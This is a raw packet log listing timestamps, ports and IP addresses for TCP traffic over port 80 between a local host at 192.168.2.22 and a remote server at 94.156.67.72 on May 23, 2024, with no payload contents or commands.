May 23, 2024 20:21:06.159445047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.159562111 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.159574032 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.159606934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.160192966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.160237074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.160254955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.160289049 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.160439968 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.160450935 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.160481930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.161073923 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.161084890 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.161119938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.161195040 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.161233902 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.161330938 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.161371946 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.162552118 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.162576914 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.162599087 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.162610054 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.162763119 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.162798882 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.162904024 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.162945032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163050890 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163090944 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163247108 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163259029 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163268089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163280010 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163289070 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163305998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163714886 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163749933 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163794041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163827896 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.163916111 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.163949966 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.164092064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.164130926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.164566040 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.164607048 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.164666891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.164707899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.164860010 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.164901018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.165015936 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.165064096 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.165441036 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.165474892 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.165537119 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.165579081 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.165695906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.165709019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.165744066 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.166449070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.166496992 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.166520119 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.166554928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.166708946 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.166764975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.166816950 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.166856050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.167216063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.167257071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.167294025 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.167327881 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.167493105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.167505980 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.167535067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.168081045 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.168093920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.168126106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.168137074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.168184042 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.168225050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.168337107 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.168375015 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.168977976 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.169020891 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.169078112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.169115067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.169234037 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.169295073 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.169394016 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.169440031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.169856071 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.169908047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.169930935 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.169970989 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.170115948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.170128107 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.170157909 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.170167923 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.170658112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.170702934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.170763016 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.170810938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.170882940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.170928001 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.171016932 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.171055079 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.178474903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.178530931 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.206590891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.206645012 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.239869118 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.239909887 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.239927053 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.239952087 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.240103006 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.240149021 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.240330935 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.240384102 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.240555048 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.240587950 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.240596056 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.240626097 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.240991116 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.241038084 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.241089106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.241133928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.241288900 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.241338015 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.241477966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.241523981 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.241832018 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.241885900 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.241957903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.242005110 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.242166996 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.242214918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.242311001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.242372036 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.242708921 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.242744923 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.242758989 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.242783070 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.242819071 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.242861986 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.243009090 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.243060112 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246400118 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246453047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246459007 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246496916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246536016 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246568918 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246602058 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246637106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246669054 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246718884 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246742010 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246751070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246753931 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246783972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246789932 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246817112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246822119 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246850014 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246861935 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246881008 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.246886015 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246918917 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.246989012 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247432947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247467041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247482061 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247498989 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247503996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247543097 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247791052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247836113 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247875929 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247909069 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247920036 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247941017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.247945070 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.247978926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.248363972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.248378992 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.248392105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.248403072 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.248405933 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.248420954 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.248434067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.249948025 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.249965906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.249979973 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.249994040 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.249995947 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250004053 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250008106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.250020981 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250036955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250524044 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.250539064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.250552893 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.250565052 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250575066 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250617027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250796080 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.250852108 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.250874043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.250911951 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.251034021 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.251075029 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.251411915 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.251430035 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.251457930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.251470089 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.251485109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.251518965 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.251692057 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.251737118 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.251813889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.251856089 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.252258062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.252300024 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.252356052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.252396107 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.252527952 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.252569914 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.252682924 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.252726078 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.252821922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.252862930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.253166914 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.253209114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.253273964 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.253314018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.253403902 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.253446102 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.254031897 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.254081964 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.254157066 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.254201889 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.254255056 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.254297018 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.254683018 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.254724026 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.254884958 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.254926920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.254990101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.255002975 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.255024910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.255034924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.255157948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.255199909 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.255790949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.255835056 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.255866051 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.255904913 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.256036043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.256050110 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.256072044 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.256082058 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.256685019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.256730080 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.256782055 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.256855965 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.256936073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.256970882 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.257509947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.257524967 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.257551908 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.257561922 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.257615089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.257657051 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.257755995 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.257793903 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.257952929 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.258006096 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.258095026 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.258137941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.258578062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.258615971 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.258625031 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.258654118 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.258768082 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.258807898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.259258032 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.259300947 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.259331942 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.259376049 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.259516001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.259526968 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.259558916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.260135889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.260180950 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.260236979 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.260247946 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.260272980 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.260283947 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.260390043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.260427952 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.261034012 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.261075974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.261126995 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.261169910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.261287928 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.261328936 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.261437893 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.261473894 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.261904001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.261945009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.262069941 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.262115955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.262181997 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.262222052 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.262887001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.262900114 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.262926102 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.294179916 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.294228077 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.331667900 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.331729889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.331760883 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.331782103 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.331984043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.332020044 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.332138062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.332180023 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.332334042 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.332384109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.332596064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.332607985 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.332644939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.332923889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.332968950 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.333139896 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.333185911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.333329916 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.333342075 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.333370924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.333380938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.333792925 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.333836079 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.333863020 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.333903074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.334100008 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.334146023 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.334291935 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.334332943 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.334764004 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.334817886 CEST	49169	80	192.168.2.22	94.156.67.72
